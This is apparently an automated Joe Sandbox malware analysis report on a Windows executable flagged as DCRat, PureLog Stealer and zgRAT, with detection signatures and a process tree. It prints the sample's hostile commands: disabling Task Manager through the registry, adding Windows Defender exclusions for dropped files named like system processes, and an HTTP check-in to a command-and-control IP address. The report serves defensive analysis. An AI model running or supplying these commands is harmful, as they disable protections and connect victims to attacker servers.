Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kBY9lgRaca.exe

Overview

General Information

Sample name:kBY9lgRaca.exe
renamed because original name is a hash value
Original sample name:3bfa5607ba2fdb912bf3c1b06950be30.exe
Analysis ID:1533405
MD5:3bfa5607ba2fdb912bf3c1b06950be30
SHA1:09f81b7d75c7c337e8e25303e70f942f52a346c3
SHA256:abb75d8cf0b557c95d295ebedcc3861cd966bb6bc53deba1d66ed6c3ec7abcde
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Module File Created By Non-PowerShell Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • kBY9lgRaca.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\kBY9lgRaca.exe" MD5: 3BFA5607BA2FDB912BF3C1B06950BE30)
    • wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7684 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • cef_process.exe (PID: 7700 cmdline: "C:\RuntimeDll/cef_process.exe" MD5: C73DF0A231280439C24218C394E0A546)
          • powershell.exe (PID: 7800 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7856 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7904 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6592 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 4900 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • mOBsSQwwQhAobhYfNDABCsnt.exe (PID: 576 cmdline: "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe" MD5: C73DF0A231280439C24218C394E0A546)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\RuntimeDll\cef_process.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\RuntimeDll\cef_process.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\RuntimeDll\cef_process.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Process Memory Space: cef_process.exe PID: 7700JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      SourceRuleDescriptionAuthorStrings
                      8.0.cef_process.exe.b10000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        8.0.cef_process.exe.b10000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          System Summary

                          barindex
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\RuntimeDll\cef_process.exe, ProcessId: 7700, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\lsass.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\RuntimeDll/cef_process.exe", ParentImage: C:\RuntimeDll\cef_process.exe, ParentProcessId: 7700, ParentProcessName: cef_process.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', ProcessId: 7800, ProcessName: powershell.exe
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\RuntimeDll\cef_process.exe, ProcessId: 7700, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\lsass.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\RuntimeDll/cef_process.exe", ParentImage: C:\RuntimeDll\cef_process.exe, ParentProcessId: 7700, ParentProcessName: cef_process.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', ProcessId: 7800, ProcessName: powershell.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kBY9lgRaca.exe", ParentImage: C:\Users\user\Desktop\kBY9lgRaca.exe, ParentProcessId: 7260, ParentProcessName: kBY9lgRaca.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" , ProcessId: 7356, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\RuntimeDll/cef_process.exe", ParentImage: C:\RuntimeDll\cef_process.exe, ParentProcessId: 7700, ParentProcessName: cef_process.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe', ProcessId: 7800, ProcessName: powershell.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-14T17:23:18.164609+020020480951A Network Trojan was detected192.168.2.74989891.199.45.18780TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: C:\RuntimeDll\cef_process.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\RuntimeDll\PBs3ExWWgPs.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\HTmgdJna.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\FelIlyfv.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\QEeosldM.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\WkOFzhSS.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\cmPeMAqD.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\hiNMadse.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\jBpuMXxn.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\jWRUMqoc.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\lYDDhZsX.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\owqLTDnh.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\tFkkvTtJ.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\uqHSBmkN.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\vdXshwoU.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\ykSQugis.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\zPzZvHLt.logReversingLabs: Detection: 70%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\RuntimeDll\cef_process.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\MOnylpdT.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\HTmgdJna.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\CNRzgtSC.logJoe Sandbox ML: detected
                          Source: kBY9lgRaca.exeJoe Sandbox ML: detected
                          Source: kBY9lgRaca.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Windows Portable Devices\07a615e8f2b317Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317Jump to behavior
                          Source: kBY9lgRaca.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kBY9lgRaca.exe
                          Source: Binary string: 5c561934e089\System.pdbigab source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb# source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: *.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001BA2E000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: 7..pDb source: cef_process.exe, 00000008.00000002.1629531486.00007FFAACE40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: .0__b77a5c561934e089\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.PDB source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C803000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.pdb_9 source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CBA69B
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CCC220
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CDB348 FindFirstFileExA,0_2_00CDB348
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                          Software Vulnerabilities

                          barindex
                          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Source: C:\RuntimeDll\cef_process.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh8_2_00007FFAAC73D28D
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh24_2_00007FFAAC72D28D

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49898 -> 91.199.45.187:80
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: global trafficHTTP traffic detected: POST /eternalgameSqlflowerDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 91.199.45.187Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.199.45.187
                          Source: unknownHTTP traffic detected: POST /eternalgameSqlflowerDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 91.199.45.187Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.45.187
                          Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.45.187/
                          Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.45.187/eternalgameSqlflowerDownloads.php
                          Source: powershell.exe, 0000000A.00000002.2496024811.00000174636CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                          Source: powershell.exe, 00000009.00000002.2550202363.0000028365875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                          Source: powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: cef_process.exe, 00000008.00000002.1540575609.000000000377F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp, mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 0000000E.00000002.2416830415.000001FE68FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                          Source: powershell.exe, 0000000E.00000002.2431522493.000001FE69010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co.
                          Source: powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                          System Summary

                          barindex
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CB6FAA
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB848E0_2_00CB848E
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CC6CDC0_2_00CC6CDC
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CB40FE0_2_00CB40FE
